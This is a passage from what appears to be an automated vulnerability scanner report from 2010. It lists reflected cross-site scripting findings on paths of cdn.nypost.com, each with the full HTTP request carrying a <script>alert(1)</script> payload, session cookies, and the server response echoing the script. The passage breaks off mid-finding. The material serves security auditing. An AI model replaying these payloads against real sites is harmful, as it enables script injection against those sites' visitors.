Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalce2a6<script>alert(1)</script>786c1e2c906/nypost/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.21. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3375<script>alert(1)</script>0641c60ed8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposta3375<script>alert(1)</script>0641c60ed8a/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposta3375<script>alert(1)</script>0641c60ed8a/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.22. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 82dc5<script>alert(1)</script>4223b8bb7b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks82dc5<script>alert(1)</script>4223b8bb7b2/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks82dc5<script>alert(1)</script>4223b8bb7b2/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.23. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 52b24<script>alert(1)</script>f631577f766 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/most_popular52b24<script>alert(1)</script>f631577f766/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/most_popular52b24<script>alert(1)</script>f631577f766/most_popular_functions.js</p>
...[SNIP]...

1.24. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 453a2<script>alert(1)</script>d24855ab4e6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js453a2<script>alert(1)</script>d24855ab4e6 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js453a2<script>alert(1)</script>d24855ab4e6</p>
...[SNIP]...

1.25. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72157<script>alert(1)</script>b863d73c23e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig72157<script>alert(1)</script>b863d73c23e/WebPortal/nypost/blocks/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig72157<script>alert(1)</script>b863d73c23e/WebPortal/nypost/blocks/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.26. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4b265<script>alert(1)</script>5c62dc37e5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4b265<script>alert(1)</script>5c62dc37e5a/nypost/blocks/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4b265<script>alert(1)</script>5c62dc37e5a/nypost/blocks/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.27. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4785<script>alert(1)</script>52e9494240c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposte4785<script>alert(1)</script>52e9494240c/blocks/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposte4785<script>alert(1)</script>52e9494240c/blocks/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.28. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9421d<script>alert(1)</script>0bbcdc49ffc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks9421d<script>alert(1)</script>0bbcdc49ffc/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks9421d<script>alert(1)</script>0bbcdc49ffc/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.29. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 64098<script>alert(1)</script>2da4cc43cc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/post_ten64098<script>alert(1)</script>2da4cc43cc/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/post_ten64098<script>alert(1)</script>2da4cc43cc/post_ten_functions.js</p>
...[SNIP]...

1.30. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cc022<script>alert(1)</script>06cdb8d3e89 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.jscc022<script>alert(1)</script>06cdb8d3e89 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.jscc022<script>alert(1)</script>06cdb8d3e89</p>
...[SNIP]...

1.31. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 848dc<script>alert(1)</script>b2588eeb12a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig848dc<script>alert(1)</script>b2588eeb12a/WebPortal/nypost/blocks/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig848dc<script>alert(1)</script>b2588eeb12a/WebPortal/nypost/blocks/search/search.js</p>
...[SNIP]...

1.32. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4546e<script>alert(1)</script>7ee4c74c348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4546e<script>alert(1)</script>7ee4c74c348/nypost/blocks/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4546e<script>alert(1)</script>7ee4c74c348/nypost/blocks/search/search.js</p>
...[SNIP]...

1.33. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

